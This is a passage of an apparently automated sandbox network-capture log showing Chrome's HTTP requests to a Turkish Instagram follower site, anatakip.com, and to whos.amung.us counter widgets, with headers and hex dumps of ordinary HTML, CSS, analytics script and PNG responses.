                    2024-05-26 22:58:31 UTC1369INData Raw: b1 6e 64 61 6e 20 62 69 7a 65 20 75 6c 61 c5 9f 61 62 69 6c 69 72 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 70 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 30 61 66 66 30 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 6b 79 70 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 53 6b 79 70 65 20 3c 2f 73 70 61 6e 3e 0a 3a 0a 3c 62 3e 3c 2f 62 3e 0a 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6a 71 75 65 72 79 2f 32 2e 32 2e 34 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 62 6f
                    Data Ascii: ndan bize ulaabilirsiniz.</p><p><span style="color:#00aff0"><i class="fa fa-skype" aria-hidden="true"></i> Skype </span>:<b></b></p></div></div></div></div><script src="/assets/jquery/2.2.4/jquery.min.js?v=1"></script><script src="/assets/bo
                    2024-05-26 22:58:31 UTC1369INData Raw: 61 79 3a 20 6e 6f 6e 65 3b 20 2f 2a 20 48 69 64 64 65 6e 20 62 79 20 64 65 66 61 75 6c 74 20 2a 2f 0a 09 09 09 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 2f 2a 20 53 74 61 79 20 69 6e 20 70 6c 61 63 65 20 2a 2f 0a 09 09 09 09 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 2f 2a 20 53 69 74 20 6f 6e 20 74 6f 70 20 2a 2f 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 20 2f 2a 20 4c 6f 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 62 6f 78 20 2a 2f 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 74 6f 70 3a 20 30 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2f 2a 20 46 75 6c 6c 20 77 69 64 74 68 20 2a 2f 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 2f 2a 20 46 75 6c 6c 20 68 65 69 67 68 74 20 2a 2f 0a 09 09
                    Data Ascii: ay: none; /* Hidden by default */position: fixed; /* Stay in place */z-index: 1; /* Sit on top */padding-top: 100px; /* Location of the box */left: 0;top: 0;width: 100%; /* Full width */height: 100%; /* Full height */
                    2024-05-26 22:58:31 UTC452INData Raw: 64 61 6c 2d 68 65 61 64 65 72 3a 3a 62 65 66 6f 72 65 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 61 66 74 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 20 2e 6d 6f 64 61 6c 2d 62 6f 64 79 2c 0a 09 09 09 23 6c 6f 67 67 65 64
                    Data Ascii: dal-header::before, #loggedAnnouncementModal .modal-header::after {display: none;}#announcementModal .modal-content, #loggedAnnouncementModal .modal-content {padding: 0;}#announcementModal .modal-content .modal-body,#logged


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    77192.168.2.549852104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:31 UTC790OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/tools
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764294.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:31 UTC742INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:58:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9Q2NhKNcmiYuawVkY6%2FFZHGWCkucLEvghjiYGr2K4LS7VB500g%2BPV379t7kj5WUbcYjeBh%2F4F7R3lnu9nfXimYuu4rldEgbjiqW4eUgvo%2FJj3E3uMakhtru3ioehm8%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15ed37880c409-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:31 UTC627INData Raw: 31 63 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c75<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:31 UTC1369INData Raw: 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e
                    Data Ascii: s/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getirin
                    2024-05-26 22:58:31 UTC1369INData Raw: 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76
                    Data Ascii: collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="nav
                    2024-05-26 22:58:31 UTC1369INData Raw: 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73
                    Data Ascii: <h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class
                    2024-05-26 22:58:31 UTC1369INData Raw: 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d
                    Data Ascii: pt><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r]
                    2024-05-26 22:58:31 UTC1190INData Raw: 09 09 09 63 6f 6c 6f 72 3a 20 23 61 61 61 61 61 61 3b 0a 09 09 09 09 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6c 6f 73 65 3a 68 6f 76 65 72 2c 0a 09 09 09 2e 63 6c 6f 73 65 3a 66 6f 63 75 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 20 7b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 79
                    Data Ascii: color: #aaaaaa;float: right;font-size: 28px;font-weight: bold;}.close:hover,.close:focus {color: #000;text-decoration: none;cursor: pointer;}.modal-open .modal {overflow-x: hidden;overflow-y
                    2024-05-26 22:58:31 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                    Data Ascii: 1
                    2024-05-26 22:58:31 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    78192.168.2.549856104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:32 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:32 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/14/1406.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15ed6bf8919eb-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:32 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    79192.168.2.549858104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:32 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:32 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/55.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15ed9799215cb-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:32 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    80192.168.2.549860104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:32 UTC591OUTGET /classic/14/1406.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:32 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:32 GMT
                    Content-Type: image/png
                    Content-Length: 1695
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-69f"
                    expires: Wed, 15 May 2024 21:49:46 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1040926
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15edb0c5842ec-EWR
                    2024-05-26 22:58:32 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 dc 50 4c 54 45 ff ff ff d2 d2 d2 c1 c1 c1 d4 d4 d4 8b 8b 8b c6 c6 c6 ac ac ac e3 e3 e3 c8 c8 c8 bc bc bc bb bb bb e7 e7 e7 b9 b9 b9 88 88 88 b7 b7 b7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88
                    Data Ascii: PNGIHDRQpPLTEtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,
                    2024-05-26 22:58:32 UTC758INData Raw: 9c 1f 2a fa 0a b3 03 7d d6 62 cf 0b 9d 0e 2f 46 ad 56 63 01 b3 f3 dc df 89 73 3e 2f 58 8b 76 db 04 9a 6a 2d a6 3e fc f6 4f c5 fe cb 8a ff 3f af 15 a3 a9 36 23 71 f3 9b 7f 10 3f ff 7a 0f ab c6 25 39 d9 59 c6 95 72 4c ac 99 8e cd ce ce 3e 46 1d 9a e4 e1 50 15 46 8e 2a bf df 7f e5 5d 7f 51 5f f8 fd b4 5d f3 ba 5f c6 67 02 64 f8 57 c8 00 9e b6 28 80 cc c8 a3 21 52 1d 1e c6 7a f7 04 46 65 16 a7 d7 fb fd df d4 93 4f 7f 79 3f 0b cf 6f f5 52 36 9d 2e 1d 4e f3 ae a0 4b 64 2d 51 67 23 f5 28 a0 95 b4 74 f9 b2 65 8a 7c c6 a9 5a 71 db 3c f5 83 28 8a af b1 34 7f ab 48 69 75 56 11 b4 e2 72 5a 48 10 35 56 51 d4 45 d0 53 02 39 89 62 04 ab 94 89 7c c6 be b6 4e df c1 69 e2 06 df 47 3e 9f 1c a7 3f f6 a9 e0 54 df 72 27 9e 40 86 29 ea 85 85 c6 14 5a 64 3c 8f 91 50 2b 0c 3c 3c
                    Data Ascii: *}b/FVcs>/Xvj->O?6#q?z%9YrL>FPF*]Q_]_gdW(!RzFeOy?oR6.NKd-Qg#(te|Zq<(4HiuVrZH5VQES9b|NiG>?Tr'@)Zd<P+<<


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    81192.168.2.549861104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:33 UTC589OUTGET /classic/00/55.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:33 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:33 GMT
                    Content-Type: image/png
                    Content-Length: 1398
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-576"
                    expires: Wed, 15 May 2024 17:21:41 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1057011
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15ede5ba94362-EWR
                    2024-05-26 22:58:33 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 9a 50 4c 54 45 ff ff ff 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53 19 1b 32 1f 20 9a 27 2b 57 3d 3e 33 33 33 66 4e 4f 39 25 26 6b 4b 4c 4e 46 46 92 55 58 20 20 20 c1 45 4a b7 55 59 a4 27 2c 24
                    Data Ascii: PNGIHDRQpPLTErrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S2 '+W=>333fNO9%&kKLNFFUX EJUY',$
                    2024-05-26 22:58:33 UTC461INData Raw: 1f 8b 2f 70 52 a1 c4 60 b5 5a 3d 48 54 38 85 75 10 c4 98 9c 5e ef bb bf bc 83 87 5f 6c 13 e2 f8 24 af 44 08 11 22 2b 9c 2c 07 7a 46 47 32 33 b7 99 f7 9e 61 98 f3 42 35 af 61 24 82 89 60 59 e1 8c 43 cf 58 92 93 cf 7e ae 47 96 b3 f7 59 d6 9f f5 0f 58 89 20 62 e0 80 fe 41 e2 c2 b1 58 20 a0 93 e9 b2 5d 8d 48 5a 6a 1a 4d 2f dc bb 84 ef c6 54 5a 2c 86 e0 f5 13 15 86 b5 ec 08 04 6c b5 ad ec 55 03 52 1a 5f aa 29 6d 88 d7 4c e3 6f 8e 61 b6 82 be 7d 88 de d2 12 b3 b0 b6 4a 08 0a ed a4 ae 89 77 66 a5 d3 b9 b5 a9 e9 d4 3a fe 66 be 13 a7 57 4f 79 fd a7 a2 38 33 b1 1a 02 66 0f 49 6a 05 3f 48 f2 4b 95 3f b5 fb 48 1c 95 4a 5e 62 19 cf 21 a8 b0 91 e4 d9 b6 89 3b 57 b4 8f dc 8d fb ba 91 e8 21 2b 89 28 03 04 de 70 b7 7b 8c 7f 8c 7b 56 d5 89 2d 42 2d 75 e3 a8 08 a3 ac 24 52
                    Data Ascii: /pR`Z=HT8u^_l$D"+,zFG23aB5a$`YCX~GYX bAX ]HZjM/TZ,lUR_)mLoa}Jwf:fWOy83fIj?HK?HJ^b!;W!+(p{{V-B-u$R


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    82192.168.2.549862104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:33 UTC359OUTGET /classic/14/1406.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:33 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:33 GMT
                    Content-Type: image/png
                    Content-Length: 1695
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-69f"
                    expires: Wed, 15 May 2024 21:49:46 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1040927
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15edfdd8b42f7-EWR
